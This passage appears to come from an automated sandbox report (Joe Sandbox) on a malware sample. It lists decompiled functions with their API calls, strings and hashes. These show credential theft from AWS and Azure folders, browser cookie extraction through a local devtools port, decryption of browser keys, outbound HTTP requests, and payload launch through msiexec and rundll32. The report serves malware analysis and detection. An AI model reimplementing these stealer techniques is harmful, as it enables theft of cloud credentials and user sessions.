                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                        • String ID:
                                        • API String ID: 3744635739-3916222277
                                        • Opcode ID: 69a2bae54ce7fcbc58c40e1d15522997e0f38347756e03d5b881b8b297cd7638
                                        • Instruction ID: e9a2ced6ef68f8d87396d50dfce4fc21654d3ea2b91cf65a8fa5a385fcf1980b
                                        • Opcode Fuzzy Hash: 69a2bae54ce7fcbc58c40e1d15522997e0f38347756e03d5b881b8b297cd7638
                                        • Instruction Fuzzy Hash: FAE1FBB190010CABCB14EBA5DCA5FFEB779AF54304F00415EF20A67191EF386A59CB69
                                        Function 004F84B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        • RegOpenKeyExA.ADVAPI32(00000000,0145B228,00000000,00020019,00000000,005005BE), ref: 004F8534
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004F85B6
                                        • wsprintfA.USER32 ref: 004F85E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 004F860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 004F861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 004F8629
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                        • String ID: - $%s\%s$?
                                        • API String ID: 3246050789-3278919252
                                        • Opcode ID: 0e13d1cdf948b876216a8a99af23b02272ad1f6c993d3999c11b1c02a54b5ef5
                                        • Instruction ID: c45ac9858e28028cc839a22ae456fa6b23178a09cc080b7d535e9b301d89fe09
                                        • Opcode Fuzzy Hash: 0e13d1cdf948b876216a8a99af23b02272ad1f6c993d3999c11b1c02a54b5ef5
                                        • Instruction Fuzzy Hash: F78111B191011C9BDB28DB54CD95FEA77B8BF48704F1082D9F20966180DF786B88CFA9
                                        Function 004F91A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004F91FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID: `dOF$`dOF$image/jpeg
                                        • API String ID: 2244384528-1895992159
                                        • Opcode ID: 7d2ace3e2c0a708697e40fe43f9cb03c3542480bab1f0946a770b2c6246c0193
                                        • Instruction ID: c36ca69af8ec4e112010f8847b0ea09fa0f6ba1f3936627320ec32f2574ac8a8
                                        • Opcode Fuzzy Hash: 7d2ace3e2c0a708697e40fe43f9cb03c3542480bab1f0946a770b2c6246c0193
                                        • Instruction Fuzzy Hash: AD71E17191020CABDB14EFE5DC85FEEB778BF88701F108609F616A7290DB38A904CB64
                                        Function 004F4FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004F8F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F5000
                                        • lstrcat.KERNEL32(?,\.azure\), ref: 004F501D
                                          • Part of subcall function 004F4B60: wsprintfA.USER32 ref: 004F4B7C
                                          • Part of subcall function 004F4B60: FindFirstFileA.KERNEL32(?,?), ref: 004F4B93
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F508C
                                        • lstrcat.KERNEL32(?,\.aws\), ref: 004F50A9
                                          • Part of subcall function 004F4B60: StrCmpCA.SHLWAPI(?,00500FC4), ref: 004F4BC1
                                          • Part of subcall function 004F4B60: StrCmpCA.SHLWAPI(?,00500FC8), ref: 004F4BD7
                                          • Part of subcall function 004F4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 004F4DCD
                                          • Part of subcall function 004F4B60: FindClose.KERNEL32(000000FF), ref: 004F4DE2
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F5118
                                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 004F5135
                                          • Part of subcall function 004F4B60: wsprintfA.USER32 ref: 004F4C00
                                          • Part of subcall function 004F4B60: StrCmpCA.SHLWAPI(?,005008D3), ref: 004F4C15
                                          • Part of subcall function 004F4B60: wsprintfA.USER32 ref: 004F4C32
                                          • Part of subcall function 004F4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 004F4C6E
                                          • Part of subcall function 004F4B60: lstrcat.KERNEL32(?,0145E758), ref: 004F4C9A
                                          • Part of subcall function 004F4B60: lstrcat.KERNEL32(?,00500FE0), ref: 004F4CAC
                                          • Part of subcall function 004F4B60: lstrcat.KERNEL32(?,?), ref: 004F4CC0
                                          • Part of subcall function 004F4B60: lstrcat.KERNEL32(?,00500FE4), ref: 004F4CD2
                                          • Part of subcall function 004F4B60: lstrcat.KERNEL32(?,?), ref: 004F4CE6
                                          • Part of subcall function 004F4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 004F4CFC
                                          • Part of subcall function 004F4B60: DeleteFileA.KERNEL32(?), ref: 004F4D81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                        • API String ID: 949356159-974132213
                                        • Opcode ID: 31b5a893363f1d662ea48a0c85e1c1a051dcd536471b157ad42b53023e97b76c
                                        • Instruction ID: 46c8321108ffa5115bbd886042f9f57c432b6ccc8fe8e3956e81e1e008ec936c
                                        • Opcode Fuzzy Hash: 31b5a893363f1d662ea48a0c85e1c1a051dcd536471b157ad42b53023e97b76c
                                        • Instruction Fuzzy Hash: EF41D7BAA4030867DB14F770DC57FED37386B54704F004599B289660C1EEB86BD8CB96
                                        Function 004F3080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004F3415
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004F35AD
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004F373A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell$lstrcpy
                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                        • API String ID: 2507796910-3625054190
                                        • Opcode ID: 76bb051041a2ac82a6820d443307e056bf68974004faecd21a97f1ca6d415992
                                        • Instruction ID: 716a76b9acf6fa877c2592bee2aad380d89ca30dc52d7a1f2da24df46153d70f
                                        • Opcode Fuzzy Hash: 76bb051041a2ac82a6820d443307e056bf68974004faecd21a97f1ca6d415992
                                        • Instruction Fuzzy Hash: 1C1210B191010C9ACB14EB91DDA2FFEB739AF14304F00459EF30A66195EF386B59CB69
                                        Function 004E9BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004E9A50: InternetOpenA.WININET(00500AF6,00000001,00000000,00000000,00000000), ref: 004E9A6A
                                        • lstrcat.KERNEL32(?,cookies), ref: 004E9CAF
                                        • lstrcat.KERNEL32(?,005012C4), ref: 004E9CC1
                                        • lstrcat.KERNEL32(?,?), ref: 004E9CD5
                                        • lstrcat.KERNEL32(?,005012C8), ref: 004E9CE7
                                        • lstrcat.KERNEL32(?,?), ref: 004E9CFB
                                        • lstrcat.KERNEL32(?,.txt), ref: 004E9D0D
                                        • lstrlen.KERNEL32(00000000), ref: 004E9D17
                                        • lstrlen.KERNEL32(00000000), ref: 004E9D26
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                        • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                        • API String ID: 3174675846-3542011879
                                        • Opcode ID: f55ac707fac376d46c5cfe3964fcb1118d816295d95a1440108bfb379572edd3
                                        • Instruction ID: d2cfe148f3c1a9008ecdcc6a5a119b02d2c09c750bf2249e82660868285aea12
                                        • Opcode Fuzzy Hash: f55ac707fac376d46c5cfe3964fcb1118d816295d95a1440108bfb379572edd3
                                        • Instruction Fuzzy Hash: 44516171910508ABCB14EBE5DC55FEE7738AF54306F40415DF20AA70D0EB786A48CF65
                                        Function 004F5510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004E62D0: InternetOpenA.WININET(00500DFF,00000001,00000000,00000000,00000000), ref: 004E6331
                                          • Part of subcall function 004E62D0: StrCmpCA.SHLWAPI(?,0145E888), ref: 004E6353
                                          • Part of subcall function 004E62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004E6385
                                          • Part of subcall function 004E62D0: HttpOpenRequestA.WININET(00000000,GET,?,0145E208,00000000,00000000,00400100,00000000), ref: 004E63D5
                                          • Part of subcall function 004E62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004E640F
                                          • Part of subcall function 004E62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004E6421
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004F5568
                                        • lstrlen.KERNEL32(00000000), ref: 004F557F
                                          • Part of subcall function 004F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004F8FE2
                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 004F55B4
                                        • lstrlen.KERNEL32(00000000), ref: 004F55D3
                                        • lstrlen.KERNEL32(00000000), ref: 004F55FE
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 3240024479-1526165396
                                        • Opcode ID: 32f1d8585695dd8dc593917a044dafecfec9d23151c3db2bf1cf29780e99c632
                                        • Instruction ID: b818d7b3593be4a17a9781b193334feab6971020d4c47d9689fd537b978b5f41
                                        • Opcode Fuzzy Hash: 32f1d8585695dd8dc593917a044dafecfec9d23151c3db2bf1cf29780e99c632
                                        • Instruction Fuzzy Hash: A8514CB091010C9BCB18FF61CDAAAFD3779AF50349F50441EE70A57591EB386B18CB6A
                                        Function 004F1520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2001356338-0
                                        • Opcode ID: afc5f61ebfe213f4af73ed6d361dd2990b944d80736e994225e5100cfaacb64a
                                        • Instruction ID: 7bb5bb3c69ea19b0cc19cac213274b05af69e0ecc14a157c87ac401381677fe1
                                        • Opcode Fuzzy Hash: afc5f61ebfe213f4af73ed6d361dd2990b944d80736e994225e5100cfaacb64a
                                        • Instruction Fuzzy Hash: BAC1A4B590010D9BCB14EF60DC99FEE7379AF54308F00459EF60997281DA78EA94CFA5
                                        Function 004F44D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004F8F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F453C
                                        • lstrcat.KERNEL32(?,0145E358), ref: 004F455B
                                        • lstrcat.KERNEL32(?,?), ref: 004F456F
                                        • lstrcat.KERNEL32(?,0145D3F0), ref: 004F4583
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004F8F20: GetFileAttributesA.KERNEL32(00000000,?,004E1B94,?,?,0050577C,?,?,00500E22), ref: 004F8F2F
                                          • Part of subcall function 004EA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004EA489
                                          • Part of subcall function 004EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004EA13C
                                          • Part of subcall function 004EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004EA161
                                          • Part of subcall function 004EA110: LocalAlloc.KERNEL32(00000040,?), ref: 004EA181
                                          • Part of subcall function 004EA110: ReadFile.KERNEL32(000000FF,?,00000000,004E148F,00000000), ref: 004EA1AA
                                          • Part of subcall function 004EA110: LocalFree.KERNEL32(004E148F), ref: 004EA1E0
                                          • Part of subcall function 004EA110: CloseHandle.KERNEL32(000000FF), ref: 004EA1EA
                                          • Part of subcall function 004F9550: GlobalAlloc.KERNEL32(00000000,004F462D,004F462D), ref: 004F9563
                                        • StrStrA.SHLWAPI(?,0145E100), ref: 004F4643
                                        • GlobalFree.KERNEL32(?), ref: 004F4762
                                          • Part of subcall function 004EA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>ON,00000000,00000000), ref: 004EA23F
                                          • Part of subcall function 004EA210: LocalAlloc.KERNEL32(00000040,?,?,?,004E4F3E,00000000,?), ref: 004EA251
                                          • Part of subcall function 004EA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>ON,00000000,00000000), ref: 004EA27A
                                          • Part of subcall function 004EA210: LocalFree.KERNEL32(?,?,?,?,004E4F3E,00000000,?), ref: 004EA28F
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F46F3
                                        • StrCmpCA.SHLWAPI(?,005008D2), ref: 004F4710
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F4722
                                        • lstrcat.KERNEL32(00000000,?), ref: 004F4735
                                        • lstrcat.KERNEL32(00000000,00500FA0), ref: 004F4744
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
